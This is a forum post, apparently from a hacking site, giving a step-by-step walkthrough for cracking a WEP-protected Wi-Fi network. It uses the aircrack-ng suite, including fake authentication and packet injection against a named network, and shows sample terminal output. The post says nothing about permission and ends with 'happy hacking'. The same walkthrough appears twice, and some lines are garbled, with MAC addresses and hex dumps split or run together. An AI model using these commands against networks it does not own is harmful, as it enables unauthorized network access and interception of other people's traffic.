Backtrack 5 : step by step WEP hack 10-05-2012, 06:05 PM
#1
1) first
open terminal dan type
airmon-ng
2) airmon-ng start (interface)
e.g : airmon-ng start wlan0
============================================
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1438 dhclient3
1507 dhclient3
1616 wpa_supplicant
1625 dhclient
1644 dhclient
Process with PID 1507 (dhclient3) is running on interface wlan0
Process with PID 1616 (wpa_supplicant) is running on interface
wlan0
Process with PID 1644 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
==================================
3) airodump-ng (monitor mode)
e.g: airodump-ng mon0
========================================
CH 1 ][ Elapsed: 0 s ][ 2012-07-29 01:26
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER
AUTH ESSID
34:08:04:FD:7A:F3 -71 26 171 64 1 54 WEP WEP
Nenas
BSSID STATION PWR Rate Lost Frames
Probe
34:08:04:FD:7A:F3 00:1A:73:27:37:CD 0 0 - 1 0 2 Nenas
34:08:04:FD:7A:F3 D0
F:9A:84:E3:94 -70 0 -54 0
8
34:08:04:FD:7A:F3 00:1E:65:A2:A5:4A -71 0 -36 0 163
========================================
4)press ctrl+c (to stop the process) type=
airodump-ng -c (channel CH) -w ( your file name) --bssid (bssid)
(monitor mode)
e.g: airodump-ng -c 1 -w ayam --bssid 34:08:04:FD:7A:F3 mon0
===============================================
CH 1 ][ Elapsed: 8 s ][ 2012-07-29 01:31
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC
CIPHER AUTH ESSID
34:08:04:FD:7A:F3 -73 9 86 761 103 1 54 WEP
WEP Nenas
BSSID STATION PWR Rate Lost Frames
Probe
34:08:04:FD:7A:F3 00:1A:73:27:37:CD 0 0 - 1 0 9
Nenas
34:08:04:FD:7A:F3 00:1E:65:A2:A5:4A -70 0 -36 1
741
34:08:04:FD:7A:F3 D0
F:9A:84:E3:94 -55 0 - 1 10 35
=====================================================
5) ok ,now we need to wait until the #data rise until 50 000 ,the more the data, the less time to crack ..so,we need to inject it to faster the #data ,type=
aireplay-ng -1 0 -a (bssid) (monitor mode)
e-g: aireplay-ng -1 0 -a 34:08:04:FD:7A:F3 mon0
==========================================================
No source MAC (-h) specified. Using the device MAC
(00:1A:73:27:37:CD)
01:37:50 Waiting for beacon frame (BSSID: 34:08:04:FD:7A:F3) on
channel 1
01:37:50 Sending Authentication Request (Open System)
01:37:50 Authentication successful
01:37:50 Sending Association Request
01:37:50 Association successful :-) (AID: 1)
=======================================================
next :
6) type:
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid) (monitor mode)
e.g: aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 34:08:04:FD:7A:F3 mon0
=====================================
No source MAC (-h) specified. Using the device MAC
(00:1A:73:27:37:CD)
Size: 80, FromDS: 0, ToDS: 1 (WEP)
BSSID = 34:08:04:FD:7A:F3
Dest. MAC = 34:08:04:FD:7A:F2
Source MAC = D0
F:9A:84:E3:94
0x0000: 0841 2c00 3408 04fd 7af3 d0df 9a84
e394 .A,.4...z.......
0x0010: 3408 04fd 7af2 5010 ca12 0200 a62b 26cb 4...z.P......
+&.
0x0020: de9e 72c4 a7c5 2442 c204 a9a6 31d4 8d6f ..r...$
B....1..o
0x0030: 114d b3a8 f7bc 3634 edc6 5197 37cb
921d .M....64..Q.7...
0x0040: a814 ec7e 2866 cdbe 8586 2007 65cd 6783 ...~
(f.... .e.g.
Use this packet ? yes
=======================================
now ,let see the #data . .it will increase rapidly . .so wait the #data until it reach 50 000 ivs. .
6) haha , and the last step is ,i like this part ,type=
aircrack-ng 2 (filename-01.cap)
e.g: aircrack-ng 2 ayam-01.cap
==================
happy hacking !
open terminal dan type
airmon-ng
2) airmon-ng start (interface)
e.g : airmon-ng start wlan0
============================================
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1438 dhclient3
1507 dhclient3
1616 wpa_supplicant
1625 dhclient
1644 dhclient
Process with PID 1507 (dhclient3) is running on interface wlan0
Process with PID 1616 (wpa_supplicant) is running on interface
wlan0
Process with PID 1644 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
==================================
3) airodump-ng (monitor mode)
e.g: airodump-ng mon0
========================================
CH 1 ][ Elapsed: 0 s ][ 2012-07-29 01:26
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER
AUTH ESSID
34:08:04:FD:7A:F3 -71 26 171 64 1 54 WEP WEP
Nenas
BSSID STATION PWR Rate Lost Frames
Probe
34:08:04:FD:7A:F3 00:1A:73:27:37:CD 0 0 - 1 0 2 Nenas
34:08:04:FD:7A:F3 D0
F:9A:84:E3:94 -70 0 -54 08
34:08:04:FD:7A:F3 00:1E:65:A2:A5:4A -71 0 -36 0 163
========================================
4)press ctrl+c (to stop the process) type=
airodump-ng -c (channel CH) -w ( your file name) --bssid (bssid)
(monitor mode)
e.g: airodump-ng -c 1 -w ayam --bssid 34:08:04:FD:7A:F3 mon0
===============================================
CH 1 ][ Elapsed: 8 s ][ 2012-07-29 01:31
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC
CIPHER AUTH ESSID
34:08:04:FD:7A:F3 -73 9 86 761 103 1 54 WEP
WEP Nenas
BSSID STATION PWR Rate Lost Frames
Probe
34:08:04:FD:7A:F3 00:1A:73:27:37:CD 0 0 - 1 0 9
Nenas
34:08:04:FD:7A:F3 00:1E:65:A2:A5:4A -70 0 -36 1
741
34:08:04:FD:7A:F3 D0
F:9A:84:E3:94 -55 0 - 1 10 35=====================================================
5) ok ,now we need to wait until the #data rise until 50 000 ,the more the data, the less time to crack ..so,we need to inject it to faster the #data ,type=
aireplay-ng -1 0 -a (bssid) (monitor mode)
e-g: aireplay-ng -1 0 -a 34:08:04:FD:7A:F3 mon0
==========================================================
No source MAC (-h) specified. Using the device MAC
(00:1A:73:27:37:CD)
01:37:50 Waiting for beacon frame (BSSID: 34:08:04:FD:7A:F3) on
channel 1
01:37:50 Sending Authentication Request (Open System)
01:37:50 Authentication successful
01:37:50 Sending Association Request
01:37:50 Association successful :-) (AID: 1)
=======================================================
next :
6) type:
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid) (monitor mode)
e.g: aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 34:08:04:FD:7A:F3 mon0
=====================================
No source MAC (-h) specified. Using the device MAC
(00:1A:73:27:37:CD)
Size: 80, FromDS: 0, ToDS: 1 (WEP)
BSSID = 34:08:04:FD:7A:F3
Dest. MAC = 34:08:04:FD:7A:F2
Source MAC = D0
F:9A:84:E3:940x0000: 0841 2c00 3408 04fd 7af3 d0df 9a84
e394 .A,.4...z.......
0x0010: 3408 04fd 7af2 5010 ca12 0200 a62b 26cb 4...z.P......
+&.
0x0020: de9e 72c4 a7c5 2442 c204 a9a6 31d4 8d6f ..r...$
B....1..o
0x0030: 114d b3a8 f7bc 3634 edc6 5197 37cb
921d .M....64..Q.7...
0x0040: a814 ec7e 2866 cdbe 8586 2007 65cd 6783 ...~
(f.... .e.g.
Use this packet ? yes
=======================================
now ,let see the #data . .it will increase rapidly . .so wait the #data until it reach 50 000 ivs. .
6) haha , and the last step is ,i like this part ,type=
aircrack-ng 2 (filename-01.cap)
e.g: aircrack-ng 2 ayam-01.cap
==================
happy hacking !
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)